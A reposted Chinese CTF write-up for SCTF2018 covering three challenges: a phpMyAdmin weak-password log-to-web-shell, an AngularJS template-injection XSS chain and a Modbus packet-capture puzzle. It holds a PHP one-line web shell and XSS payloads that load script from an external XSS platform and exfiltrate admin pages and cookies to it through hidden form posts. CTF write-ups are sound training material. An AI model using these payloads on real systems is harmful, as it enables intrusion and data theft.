SCTF2018 Writeup
_____ _____ _______ ______ / ____|/ ____|__ __| ____| | (___ | | | | | |__ \___ \| | | | | __| ____) | |____ | | | | |_____/ \_____| |_| |_|
__________WEB_____________javascript
0x01 easiest web – phpMyAdmin
思路: 弱口令(root / root)登录phpmyadmin,利用日志功能进行getshellphp
送分题,轻松一下 http://47.97.214.247:20001/phpmyadmin Alternate address: http://218.245.4.98:20000/phpmyadmin
开启日志,写入一句话css
查询sql语句html
<?php @eval($_POST['cmd']);?>
日志写入到网站路径下的dasdasdas.php文件前端
而后就getshelljava
http://218.245.4.98:20000/dasdasdad.php 密码:cmd 菜刀链接
在C盘发现flagjquery
sctf{31cf2213cc49605a30f07395d6e5b9c4}
0x02 新的建议板web
解题思路:从前台发现留言板存在anjularjs的模板注入 ,js中发现api接口,发现须要另一个管理员帐号post带入访问密码才能获取到flagajax
师傅最近开始学前端 想写个建议板 后来失败了? http://116.62.137.114:4879
Anjularjs的模板注入 sql
Payload:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(123)//');}}
用eval(atob("base64"))进行base64加密,绕过过滤
1.1 利用xss获取管理员后台地址
xss平台地址:
http://xsspt.com/aQCIrX?1529652200
使用getScript方法动态加载JS:
$.getScript('http://xsspt.com/aQCIrX?1529652200'); >>base64 >> JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK
eval(atob("JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK"));
在留言板输入下面Payload 能够打到管理员的后台地址和cookie:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
location : http://127.0.0.1:1002/admin/suggest?suggest=%7B%7B'a'.constructor.prototype.charAt=[].join;$eval('x=1%7D%20%7D%20%7D;eval(atob(%5C'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK%5C'));//');%7D%7D%0D%0A
url解码:
location : http://127.0.0.1:1002/admin/suggest?suggest={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
能够发现后台地址在内网http://127.0.0.1:1002/admin/
1.2 利用Jquery获取后台页面源码
首先在xss平台新建模块以下所示:
代码:
$.ajax({
url: "/admin",
type: "GET",
dataType: "text",
success: function(result) {
var code = btoa(encodeURIComponent(result));
xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);
},
error: function(msg) {
}
})
function xssPost(url, postStr) {
var de;
de = document.body.appendChild(document.createElement('iframe'));
de.src = 'about:blank';
de.height = 1;
de.width = 1;
de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
de.contentDocument.forms[0].submit();
de.style.display = 'none';
}
此时获取后台的xss模块已经创建好,须要在原有模块上更新使用模块,默认是使用获取cookie的模块
而后再在留言板上输入payload:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
稍等片刻,便可获取到消息
复制code后面的base64代码:
code: JTNjIURPQ1RZUEUraHRtbCUzZSUwZCUwYSUzY2h0bWwrbGFuZyUzZCUyMnpoLUNOJTIyJTNlJTBkJTBhKyslM2NoZWFkJTNlJTBkJTBhKysrKyUzY21ldGErY2hhcnNldCUzZCUyMnV0Zi04JTIyJTNlJTBkJTBhKysrKyUzY21ldGEraHR0cC1lcXVpdiUzZCUyMlgtVUEtQ29tcGF0aWJsZSUyMitjb250ZW50JTNkJTIySUUlM2RlZGdlJTIyJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMnZpZXdwb3J0JTIyK2NvbnRlbnQlM2QlMjJ3aWR0aCUzZGRldmljZS13aWR0aCUyYytpbml0aWFsLXNjYWxlJTNkMSUyMiUzZSUwZCUwYSsrKyslM2MhLS0rJWU0JWI4JThhJWU4JWJmJWIwMyVlNCViOCVhYW1ldGElZTYlYTAlODclZTclYWQlYmUqJWU1JWJmJTg1JWU5JWExJWJiKiVlNiU5NCViZSVlNSU5YyVhOCVlNiU5YyU4MCVlNSU4OSU4ZCVlOSU5ZCVhMiVlZiViYyU4YyVlNCViYiViYiVlNCViZCU5NSVlNSU4NSViNiVlNCViYiU5NiVlNSU4NiU4NSVlNSVhZSViOSVlOSU4MyViZColZTUlYmYlODUlZTklYTElYmIqJWU4JWI3JTlmJWU5JTlhJThmJWU1JTg1JWI2JWU1JTkwJThlJWVmJWJjJTgxKy0tJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMmRlc2NyaXB0aW9uJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbWV0YStuYW1lJTNkJTIyYXV0aG9yJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbGluaytyZWwlM2QlMjJpY29uJTIyK2hyZWYlM2QlMjIlMjIlM2UlMGQlMGElMGQlMGErKysrJTNjdGl0bGUlM2VTWUMlM2MlMmZ0aXRsZSUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmY3NzJTJmYm9vdHN0cmFwLm1pbi5jc3MlMjIrcmVsJTNkJTIyc3R5bGVzaGVldCUyMiUzZSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJjc3MlMmZpZTEwLXZpZXdwb3J0LWJ1Zy13b3JrYXJvdW5kLmNzcyUyMityZWwlM2QlMjJzdHlsZXNoZWV0JTIyJTNlJTBkJTBhKysrKyUzY2xpbmsraHJlZiUzZCUyMmNzcyUyZnN0YXJ0ZXItdGVtcGxhdGUuY3NzJTIyK3JlbCUzZCUyMnN0eWxlc2hlZXQlMjIlM2UlMGQlMGErKysrJTNjc3R5bGUrdHlwZSUzZCUyMnRleHQlMmZjc3MlMjIlM2UlMGQlMGErKysrKysrKysrYm9keSslN2IlMGQlMGErKysrKysrKysrKytwYWRkaW5nLXRvcCUzYSs2MHB4JTNiJTBkJTBhKysrKysrKysrKysrcGFkZGluZy1ib3R0b20lM2ErNDBweCUzYiUwZCUwYSsrKysrKysrKyslN2QlMGQlMGErKysrKysrKyUzYyUyZnN0eWxlJTNlJTBkJTBhJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmFuZ3VsYXIuanMlMmYxLjQuNiUyZmFuZ3VsYXIubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmFwcHMuYmRpbWcuY29tJTJmbGlicyUyZmFuZ3VsYXItcm91dGUlMmYxLjMuMTMlMmZhbmd1bGFyLXJvdXRlLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllLWVtdWxhdGlvbi1tb2Rlcy13YXJuaW5nLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTBkJTBhKyslM2MlMmZoZWFkJTNlJTBkJTBhJTBkJTBhKyslM2Nib2R5KyUzZSUwZCUwYSUwZCUwYSsrKyslM2NuYXYrY2xhc3MlM2QlMjJuYXZiYXIrbmF2YmFyLWludmVyc2UrbmF2YmFyLWZpeGVkLXRvcCUyMiUzZSUwZCUwYSsrKysrKyUzY2RpditjbGFzcyUzZCUyMmNvbnRhaW5lciUyMiUzZSUwZCUwYSsrKysrKysrJTNjZGl2K2NsYXNzJTNkJTIybmF2YmFyLWhlYWRlciUyMiUzZSUwZCUwYSsrKysrKysrKyslM2NidXR0b24rdHlwZSUzZCUyMmJ1dHRvbiUyMitjbGFzcyUzZCUyMm5hdmJhci10b2dnbGUrY29sbGFwc2VkJTIyK2RhdGEtdG9nZ2xlJTNkJTIyY29sbGFwc2UlMjIrZGF0YS10YXJnZXQlM2QlMjIlMjNuYXZiYXIlMjIrYXJpYS1leHBhbmRlZCUzZCUyMmZhbHNlJTIyK2FyaWEtY29udHJvbHMlM2QlMjJuYXZiYXIlMjIlM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyc3Itb25seSUyMiUzZVRvZ2dsZStuYXZpZ2F0aW9uJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKysrKyUzY3NwYW4rY2xhc3MlM2QlMjJpY29uLWJhciUyMiUzZSUzYyUyZnNwYW4lM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyaWNvbi1iYXIlMjIlM2UlM2MlMmZzcGFuJTNlJTBkJTBhKysrKysrKysrKysrJTNjc3BhbitjbGFzcyUzZCUyMmljb24tYmFyJTIyJTNlJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKyslM2MlMmZidXR0b24lM2UlMGQlMGErKysrKysrKysrJTNjYStjbGFzcyUzZCUyMm5hdmJhci1icmFuZCUyMitocmVmJTNkJTIyJTJmJTIyJTNlU1lDK0FETUlOJTNjJTJmYSUzZSUwZCUwYSsrKysrKysrJTNjJTJmZGl2JTNlJTBkJTBhKysrKysrKyslM2NkaXYraWQlM2QlMjJuYXZiYXIlMjIrY2xhc3MlM2QlMjJjb2xsYXBzZStuYXZiYXItY29sbGFwc2UlMjIlM2UlMGQlMGErKysrKysrKysrJTNjdWwrY2xhc3MlM2QlMjJuYXYrbmF2YmFyLW5hdiUyMiUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpK2NsYXNzJTNkJTIyYWN0aXZlJTIyJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlSG9tZSUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlJWU2JTk3JWE1JWU1JWJmJTk3JTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTglYjQlYTYlZTUlOGQlOTUlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrKyslM2NsaSUzZSUzY2EraHJlZiUzZCUyMmFkbWluJTJmZmlsZSUyMiUzZSVlNiU5NiU4NyVlNCViYiViNiUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyYWRtaW4lMmZzdWdnZXN0JTIyJTNlJWU3JTk1JTk5JWU4JWE4JTgwJTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTUlOGYlOTElZTUlYjglODMlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrJTNjJTJmdWwlM2UlMGQlMGErKysrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKyslM2MlMmZuYXYlM2UlMGQlMGElMGQlMGElMGQlMGElM2NkaXYrY2xhc3MlM2QlMjJjb250YWluZXIlMjIlM2UlMGQlMGErKyUzY2RpditjbGFzcyUzZCUyMmp1bWJvdHJvbiUyMiUzZSUwZCUwYSsrKysrKysrJTNjaDElM2VIRUxMTythZG1pbkNsb3VuZCUzYyUyZmgxJTNlJTBkJTBhKysrKysrKyslM2NwJTNlJWU2JTk2JWIwJWU3JTg5JTg4JWU1JTkwJThlJWU1JThmJWIwMi4wISUzYyUyZnAlM2UlMGQlMGErKyUzYyUyZmRpdiUzZSUwZCUwYSUzYyUyZmRpdiUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2MhLS0rQm9vdHN0cmFwK2NvcmUrSmF2YVNjcmlwdCUwZCUwYSUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCstLSUzZSUwZCUwYSUzYyEtLStQbGFjZWQrYXQrdGhlK2VuZCtvZit0aGUrZG9jdW1lbnQrc28rdGhlK3BhZ2VzK2xvYWQrZmFzdGVyKy0tJTNlJTBkJTBhJTNjc2NyaXB0K3NyYyUzZCUyMmh0dHBzJTNhJTJmJTJmY2RuLmJvb3Rjc3MuY29tJTJmanF1ZXJ5JTJmMS4xMi40JTJmanF1ZXJ5Lm1pbi5qcyUyMiUzZSUzYyUyZnNjcmlwdCUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmanMlMmZib290c3RyYXAubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTNjIS0tK0lFMTArdmlld3BvcnQraGFjaytmb3IrU3VyZmFjZSUyZmRlc2t0b3ArV2luZG93cys4K2J1ZystLSUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllMTAtdmlld3BvcnQtYnVnLXdvcmthcm91bmQuanMlMjIlM2UlM2MlMmZzY3JpcHQlM2UlMGQlMGElMGQlMGElM2MlMmZib2R5JTNlJTBkJTBhJTNjJTJmaHRtbCUzZSUwZCUwYSUwZCUwYQ==
保存在admin.txt
利用pentestbox进行base64解码
> cat admin.txt |base64 -d
再次进行url解码
解码结果保存在admiin.html
<!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- 上述3个meta标签*必须*放在最前面,任何其余内容都*必须*跟随其后! --> <meta name="description" content=""> <meta name="author" content=""> <link rel="icon" href=""> <title>SYC</title> <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"> <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet"> <link href="css/starter-template.css" rel="stylesheet"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } </style> <script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script> <script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script> <script src="js/ie-emulation-modes-warning.js"></script> </head> <body > <nav class="navbar navbar-inverse navbar-fixed-top"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/">SYC ADMIN</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li class="active"><a href="#">Home</a></li> <li><a href="#">日志</a></li> <li><a href="#">帐单</a></li> <li><a href="admin/file">文件</a></li> <li><a href="admin/suggest">留言</a></li> <li><a href="#">发布</a></li> </ul> </div> </div> </nav> <div class="container"> <div class="jumbotron"> <h1>HELLO adminClound</h1> <p>新版后台2.0!</p> </div> </div> <!-- Bootstrap core JavaScript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script> <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <!-- IE10 viewport hack for Surface/desktop Windows 8 bug --> <script src="js/ie10-viewport-bug-workaround.js"></script> </body> </html>
发现管理员帐号: adminClound
1.3 利用js api接口,找到文件密码
在一开始的首页里有个 min-test.js ,这里泄露了admin模板文件view/admintest2313.html,在这个模板中发现一个备忘录的接口
替换成管理员帐号,访问 http://116.62.137.114:4879/api/memos/adminClound
获得文件访问密码
拿到文件密码后,构造包访问 /admin/file页面和上面获取admin页面同样
<!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- 上述3个meta标签*必须*放在最前面,任何其余内容都*必须*跟随其后! --> <meta name="description" content=""> <meta name="author" content=""> <link rel="icon" href=""> <title>SYC</title> <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"> <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet"> <link href="css/starter-template.css" rel="stylesheet"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } </style> <script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script> <script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script> <script src="js/ie-emulation-modes-warning.js"></script> </head> <body > <nav class="navbar navbar-inverse navbar-fixed-top"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/">SYC ADMIN</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li class="active"><a href="#">Home</a></li> <li><a href="#">日志</a></li> <li><a href="#">帐单</a></li> <li><a href="admin/file">文件</a></li> <li><a href="admin/suggest">留言</a></li> <li><a href="#">发布</a></li> </ul> </div> </div> </nav> <div class="container"> <form method="post"> <label for="filePasswd" class="sr-only">输入文件密码</label> <input type="text" id="filePasswd" class="form-control" placeholder="filepasswd" required="" autofocus="" name="filepasswd"> <button class="btn btn-lg btn-primary btn-block" type="submit">提交</button> </form> </div> <!-- Bootstrap core JavaScript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script> <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <!-- IE10 viewport hack for Surface/desktop Windows 8 bug --> <script src="js/ie10-viewport-bug-workaround.js"></script> </body> </html>
1.4 输入文件密码,获取flag
一样须要在xss平台设置模块,并引用该模块
$.ajax({ url: "/admin/file", type: "POST", dataType: "text", data: "filepasswd=HGf^%2639NsslUIf^23", success: function(result) { var code = btoa(encodeURIComponent(result)); xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code); }, error: function(msg) { } }) function xssPost(url, postStr) { var de; de = document.body.appendChild(document.createElement('iframe')); de.src = 'about:blank'; de.height = 1; de.width = 1; de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>'); de.contentDocument.forms[0].submit(); de.style.display = 'none'; }
留言板再次提交payload
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
稍等片刻便可,查看xss平台
code : c2N0ZiU3QlQ0aXNfaXNfZjFhZzIzMTMlN0Q=
base64解码后再url解码
sctf{T4is_is_f1ag2313}
________________MiSC ________________
0x03 神奇的Modbus
思路:根据题目Modbus,只要过滤Modbus协议,跟随tcp流就能够找到flag
寻找flag
附件: http://sctf2018.xctf.org.cn/media/task/c7348d96-947d-48ef-a91d-2b3eb647d9a9.zip
下载附件,解压,用wireshark分析
过滤以前:
过滤以后:
跟随第一个tcp 流
找到flag
sctf{Easy_Mdbus}
提交答案发现不对
尝试加个o,提交正确
sctf{Easy_Modbus}
相关文章
- 1. writeup
- 2. WriteUp
- 3. 0ctf writeup
- 4. BCTF Writeup
- 5. BUUCTF-Writeup
- 6. sqli_labs writeup
- 7. Natas25-writeup
- 8. CTF writeup
- 9. Seclab-----WriteUp
- 10. writeup wireshark
- 更多相关文章...
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
欢迎关注本站公众号,获取更多信息
相关文章
- 1. writeup
- 2. WriteUp
- 3. 0ctf writeup
- 4. BCTF Writeup
- 5. BUUCTF-Writeup
- 6. sqli_labs writeup
- 7. Natas25-writeup
- 8. CTF writeup
- 9. Seclab-----WriteUp
- 10. writeup wireshark